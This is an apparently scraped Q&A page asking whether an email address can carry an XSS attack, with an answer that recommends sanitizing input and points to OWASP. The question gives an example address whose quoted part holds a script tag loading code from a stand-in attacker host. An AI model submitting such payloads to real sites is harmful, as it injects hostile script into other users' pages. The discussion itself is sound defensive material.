{var%20f='http://v.t.sina.com.cn/share/share.php?appkey=1515056452',u=z||d.location,p=['&url=',e(u),'&title=',e(t||d.title),'&source=',e(r),'&sourceUrl=',e(l),'&content=',c||'gb2312','&pic=',e(p||'')].join('');function%20a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=440,height=430,left=',(s.width-440)/2,',top=',(s.height-430)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else%20a();})(screen,document,encodeURIComponent,'','','https://www.manongdao.com/data/attach/logo/logo.png', '推荐 狗以群分 的问题《Are XSS attacks possible through email addresses?》','https://www.manongdao.com/q-574254.html','页面编码gb2312|utf-8默认gb2312'));){kind=link}
I wonder whether an email address can be used for XSS attacks.
Let's suppose there is a website where one can register and gives his email address. If one wants to attack the given website, he or she might create an email address, such as this one:
"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com
and then use this email address to attack the website.
Is quote or script tag allowed in an email address?
The email address in your example appears valid. The only character that is unusual is the quote
"-- rest others are valid.Wikipedia suggests that the email address you specified is valid.
You need to ensure that arbitrary user input is sanitized before being rendered.
To begin with, you might want to refer to information about XSS and prevention available at OWASP.